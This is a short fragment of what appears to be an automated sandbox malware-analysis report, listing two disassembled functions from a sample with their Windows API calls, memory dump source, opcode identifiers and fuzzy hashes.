                                              • Opcode ID: 398f690dd63b4dc214b9c005ea9467d16438635c8015b47d51cfcc86b307485e
                                              • Instruction ID: 7d5483026b8d33337ac4a9549a5db5e9d718fad291004e212951830aed23f32c
                                              • Opcode Fuzzy Hash: 398f690dd63b4dc214b9c005ea9467d16438635c8015b47d51cfcc86b307485e
                                              • Instruction Fuzzy Hash: 9B0186B6A50100EBD664EB65ED4ABA633A4B71C705FC08425F746862A0DFB85444CFAF
                                              Function 0041E678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumber
                                              • String ID: <
                                              • API String ID: 3700106692-4251816714
                                              • Opcode ID: 8250a3e23bbfec59b690a0df1105bb907fd8dd0d175828653fc7dd8941d46e01
                                              • Instruction ID: 78699f444b43a7322d8c77efa18837f699f308161780eb29aa2cbd1f541736c2
                                              • Opcode Fuzzy Hash: 8250a3e23bbfec59b690a0df1105bb907fd8dd0d175828653fc7dd8941d46e01
                                              • Instruction Fuzzy Hash: 220171751083829FC720DF25D84465FB7E4FF84329F858D1DE5A44A240C778954ACB4B